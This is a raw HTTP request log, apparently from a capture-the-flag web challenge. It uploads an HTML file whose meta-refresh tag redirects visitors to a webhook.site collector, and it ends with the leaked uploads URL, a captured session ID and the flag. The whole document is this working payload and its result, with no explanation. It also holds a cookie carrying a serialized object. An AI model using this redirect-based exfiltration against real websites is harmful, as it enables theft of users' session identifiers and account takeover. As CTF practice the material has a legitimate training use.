POST /?upload HTTP/1.1
Host: chal.cybersecurityrumble.de:7667
Content-Length: 448
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://chal.cybersecurityrumble.de:7667
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylpcMnrvLwMBiLKxK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://chal.cybersecurityrumble.de:7667/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: user=8004953a000000000000008c06776562617070948c04557365729493942981947d94288c08757365726e616d65948c036c656f948c0a7065726d697373696f6e948975622e-839e3bbc; PHPSESSID=8du6ncikva8umc9m67v1u7eheh
Connection: close

------WebKitFormBoundarylpcMnrvLwMBiLKxK
Content-Disposition: form-data; name="file"; filename="meta-redirect.htm"
Content-Type: text/html

<html>
	<meta name="language"
content="0;https://webhook.site/a17c8ffe-10ee-4981-ab8b-11c41180b760"HTTP-EQUIV="refresh"" />
	<head></head>
	<body>hax</body>
</html>
------WebKitFormBoundarylpcMnrvLwMBiLKxK
Content-Disposition: form-data; name="type"

htm
------WebKitFormBoundarylpcMnrvLwMBiLKxK--




http://web/uploads/iuL3cC1fR2oScRakxUkd.htm?lang=en&ref=website&pd=673e4a8d240d0ba0a0cdb3db6ec8af65&u=5fa225836916d&client=pybu3zheoyeupyzgodcrxf7oqc&method=direct&t=1604461955

PHPSESSIID: pybu3zheoyeupyzgodcrxf7oqc
	CSR{N1C3_4ND-E4ZY-W4snT-1T?-:)}
